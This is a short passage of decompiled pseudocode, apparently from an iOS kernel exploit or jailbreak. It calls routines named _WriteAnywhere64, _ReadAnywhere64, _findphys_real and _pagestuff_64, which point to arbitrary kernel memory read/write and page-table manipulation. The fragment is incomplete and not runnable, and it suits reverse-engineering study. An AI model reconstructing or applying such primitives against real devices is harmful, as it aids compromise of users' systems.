3100.     r8 = *(r31 + 0x1568) & 0xfff;
3101.     *(r31 + 0x9d0) = r8;
3102.     *(r31 + 0x1568) = *(r31 + 0x9d0) | _findphys_real() & 0xfffffffffffff000;
3103.     *(r31 + 0x17b0) = *(r31 + 0x1560);
3104.     *(r31 + 0x9c8) = _WriteAnywhere64();
3105.     *(r31 + 0x1558) = _constget() + 0x10001e1b8;
3106.     *(r31 + 0x1528) = *__NSConcreteStackBlock;
3107.     *(r31 + 0x1530) = r31 | 0xffffffffc0000000;
3108.     *(r31 + 0x1534) = r31;
3109.     *(r31 + 0x1538) = 0x100016de0;
3110.     *(r31 + 0x1540) = 0x10001c6b0;
3111.     *(r31 + 0x1548) = *(r31 + 0x1580);
3112.     *(r31 + 0x1550) = *(r31 + 0x1558);
3113.     _pagestuff_64();
3114.     goto loc_100012da4;
3115.  
3116. loc_10000faf4:
3117.     *(r31 + 0x1898) = _ReadAnywhere64();
3118.     goto loc_10000fa74;
3119. }